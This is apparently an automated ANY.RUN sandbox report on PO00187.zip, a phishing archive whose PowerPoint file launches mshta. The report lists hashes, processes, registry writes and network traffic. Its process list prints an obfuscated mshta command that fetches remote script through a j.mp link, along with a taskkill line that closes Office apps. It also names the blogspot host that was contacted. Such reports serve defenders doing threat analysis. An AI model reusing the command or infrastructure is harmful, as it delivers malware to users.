analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PO00187.zip

Full analysis: https://app.any.run/tasks/43a9e69a-b94a-4e1c-88c6-1f2118456f77
Verdict: Malicious activity
Analysis date: May 25, 2024, 01:46:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

AEFBF777BC7D03434D1F0B22B53D1098

SHA1:

95B8B8916851B31174A5E91478517E43FF48FBC8

SHA256:

BF0A7997CF340B4C22A7206B22B682B29E73C0C315D5360C189ED18032C58051

SSDEEP:

768:PSEb25xLiOKiEqiW3p2F9HtN/urCtXBKSLVaLHiYpFKYlqnLF1GbmmU5q3GO1fc0:bbiKTnep2F9HtN/qCtXVa+YpTl4LF1Gp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from MS Office

      • POWERPNT.EXE (PID: 4036)

    • Modifies registry startup key (SCRIPT)

      • mshta.exe (PID: 1200)

    • Creates a new registry key or changes the value of an existing one (SCRIPT)

      • mshta.exe (PID: 1200)

  • SUSPICIOUS

    • Reads the Internet Settings

      • mshta.exe (PID: 1200)

    • Runs shell command (SCRIPT)

      • POWERPNT.EXE (PID: 4036)
      • mshta.exe (PID: 1200)

    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 1884)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 1200)

  • INFO

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 3980)

    • Checks proxy server information

      • mshta.exe (PID: 1200)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 1620)

    • Reads the computer name

      • wmpnscfg.exe (PID: 1620)

    • Checks supported languages

      • wmpnscfg.exe (PID: 1620)

    • Reads CPU info

      • mshta.exe (PID: 1200)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 1200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: PO#00187.ppt
ZipUncompressedSize: 136192
ZipCompressedSize: 44466
ZipCRC: 0xd2149f9e
ZipModifyDate: 2021:02:25 17:52:06
ZipCompression: Deflated
ZipBitFlag: 0x0001
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
9
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs powerpnt.exe no specs mshta.exe ping.exe no specs winword.exe no specs wmpnscfg.exe no specs cmd.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3980"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\PO00187.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
4036"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\admin\AppData\Local\Temp\Rar$DIb3980.39004\PO#00187.ppt"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft PowerPoint
Version:
14.0.6009.1000
Modules
Images
c:\program files\microsoft office\office14\powerpnt.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\ppcore.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1200mSHtA http://12384928198391823%[email protected]/hdkjashdkasbctdgjsaC:\Windows\System32\mshta.exe
POWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
3221225547
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
1440pingC:\Windows\System32\PING.EXEPOWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
2180winwordC:\Program Files\Microsoft Office\Office14\WINWORD.EXEPOWERPNT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
1620"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1884"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exeC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1804taskkill /f /im winword.exe C:\Windows\System32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
2556taskkill /f /im EXCEL.exeC:\Windows\System32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
Total events
17 385
Read events
16 625
Write events
602
Delete events
158

Modification events

(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3980) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\PO00187.zip
(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3980) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
0
Suspicious files
26
Text files
15
Unknown types
0

Dropped files

PID
Process
Filename
Type
4036POWERPNT.EXEC:\Users\admin\AppData\Local\Temp\CVRC0B2.tmp.cvr
MD5:
SHA256:
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR1124.tmp.cvr
MD5:
SHA256:
1200mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:41511994EA36CE6423CE579D28515377
SHA256:7C8DE661C592E0BFA09B241BB2E5E372756BBE2281989DAED9CBC5EE7E824B7E
2180WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:2B03871AC75694E6A00AD31B2E50B84E
SHA256:01B00ADC7AD89DEF3CA3250983495A54EFB10E50F842F8C1F3C0F011B3D20BF3
1200mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199binary
MD5:A3C83BA7A9459112192D5561351E0C00
SHA256:59CAE60257360657B02F10856C0E390AF53FCF9638E08A5E65613D3DB6771BAA
1200mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_84F2D26713B03AC2BA719BC2585CCFC4binary
MD5:6CA0B66CD515CC0C20029EC0A892385A
SHA256:8CA980D96E21F3D6CA53B96323A3BD9A4C159D29800A632A1893C82E52E41F2F
1200mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\3566091532-css_bundle_v2[1].csstext
MD5:1E32420A7B6DDBDCB7DEF8B3141C4D1E
SHA256:A9CA837900B6AE007386D400F659C233120B8AF7D93407FD6475C9180D9E83D2
1200mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:3BFB237D95F9C34465D50360F39B3CEB
SHA256:2CEADDB29268E6112E7AA95722894FB061238AD4E2B247CE23595609DAA5EB8D
1200mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199binary
MD5:8D1040B12A663CA4EC7277CFC1CE44F0
SHA256:3086094D4198A5BBD12938B0D2D5F696C4DFC77E1EAE820ADDED346A59AA8727
1200mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:B13FF1DD8418C1252DB8BC6C305D5348
SHA256:3A7471436322E4F4C3B86FD86BF57A19469004AF420688B697CEB5A504F371B4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
21
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1200
mshta.exe
GET
301
67.199.248.16:80
http://j.mp/hdkjashdkasbctdgjsa
unknown
unknown
1200
mshta.exe
GET
200
142.250.185.227:80
http://c.pki.goog/r/r1.crl
unknown
unknown
1200
mshta.exe
GET
304
2.19.126.151:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?901ef983ada5e499
unknown
unknown
1200
mshta.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEDgXCzjQFnt3Ek2v0qh%2Fpmw%3D
unknown
unknown
1200
mshta.exe
GET
200
142.250.185.227:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
unknown
1200
mshta.exe
GET
200
142.250.185.227:80
http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDcoc6fqZ4zlBD%2FfhdqltwL
unknown
unknown
1200
mshta.exe
GET
200
142.250.185.227:80
http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCJpTHr%2BknHZxDj7EG2XHs5
unknown
unknown
1200
mshta.exe
GET
200
142.250.185.227:80
http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD52znXgmjnXwogfY0LOz7q
unknown
unknown
1200
mshta.exe
GET
200
142.250.185.227:80
http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEGeOmj4kEWGqCUapKcz1epE%3D
unknown
unknown
1200
mshta.exe
GET
200
142.250.185.227:80
http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDZoox0IQ8m3xC1TREVzbmV
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1088
svchost.exe
224.0.0.252:5355
unknown
1200
mshta.exe
67.199.248.16:80
j.mp
GOOGLE-CLOUD-PLATFORM
US
shared
1200
mshta.exe
142.250.184.225:443
iknowyoudidntlikeme.blogspot.com
GOOGLE
US
whitelisted
1200
mshta.exe
2.19.126.151:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown
1200
mshta.exe
142.250.185.227:80
ocsp.pki.goog
GOOGLE
US
whitelisted
1200
mshta.exe
142.250.184.201:443
www.blogger.com
GOOGLE
US
unknown
1200
mshta.exe
64.233.167.84:443
accounts.google.com
GOOGLE
US
unknown
1200
mshta.exe
142.250.184.196:443
www.google.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
j.mp
  • 67.199.248.16
  • 67.199.248.17
unknown
iknowyoudidntlikeme.blogspot.com
  • 142.250.184.225
whitelisted
ctldl.windowsupdate.com
  • 2.19.126.151
  • 2.19.126.137
whitelisted
ocsp.pki.goog
  • 142.250.185.227
whitelisted
c.pki.goog
  • 142.250.185.227
unknown
o.pki.goog
  • 142.250.185.227
unknown
www.blogger.com
  • 142.250.184.201
shared
accounts.google.com
  • 64.233.167.84
shared
resources.blogblog.com
  • 142.250.184.201
whitelisted
fonts.googleapis.com
  • 142.250.186.74
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
PO00187.zip